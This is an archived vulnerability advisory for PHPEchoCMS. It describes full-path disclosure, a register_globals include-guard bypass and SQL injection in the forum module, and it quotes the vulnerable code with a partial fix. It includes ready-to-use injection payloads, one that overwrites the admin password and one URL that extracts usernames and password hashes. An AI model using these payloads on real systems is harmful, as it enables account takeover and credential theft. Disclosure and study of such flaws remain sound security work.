TUCoPS :: Web :: CMS / Portals :: bx1499.htm

PHPEchoCMS Multible remote vulnerabilitis
PHPEchoCMS Multible remote vulnerabilitis
PHPEchoCMS Multible remote vulnerabilitis


Hello,,=0D
=0D
PHPEchoCMS Multible remote vulnerabilitis=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
=0D
fiest thing ..=0D
full path=0D
kernel/init.php=0D
modules/admin/index.php=0D
..=0D
every file to be included has to have the value of the variable $BASE_LOAD=0D
but if the register globals is on then you can use in the browser like this ..=0D
modules/files/index.php?BASE_LOAD=1=0D
=0D
it will continue .. and other files too=0D
=0D
modules/forum/index.php=0D
lines [31-49]=0D
    if (@$_POST['post']=='thread')=0D
    {=0D
        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])=0D
        {=0D
                    // Add the thread to the specified section=0D
             $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).=0D
              "', '".str_replace("\n", "
", addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')";=0D
              $res = query($ins, 1);=0D
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);=0D
              $res = query($ins, 1);=0D
              $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);=0D
              redirect ("index.php?module=forum&show=thread&id=".$nb);=0D
         }=0D
         else=0D
         {=0D
              $content = $mlang['017'];=0D
=0D
         }=0D
    }=0D
=0D
see=0D
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);=0D
=0D
could be modified to an update query by posting value of id as next=0D
id=union update members set password=[value] where id=1=0D
=0D
offcourse value here should be md5 hash .. and no brackets so the query will be ok :)=0D
=0D
=0D
lines[138-142]=0D
=0D
    elseif (@$_GET['show']=='thread' && $_GET['id'])=0D
    {=0D
             // Show a thread and its replies (child-threads)=0D
=0D
            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);=0D
=0D
replace with=0D
    elseif (@$_GET['show']=='thread' && $_GET['id'])=0D
    {=0D
             // Show a thread and its replies (child-threads)=0D
=0D
            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);=0D
=0D
=0D
exploit=0D
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*=0D
=0D
=0D
=0D
# WwW.SoQoR.NeT

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH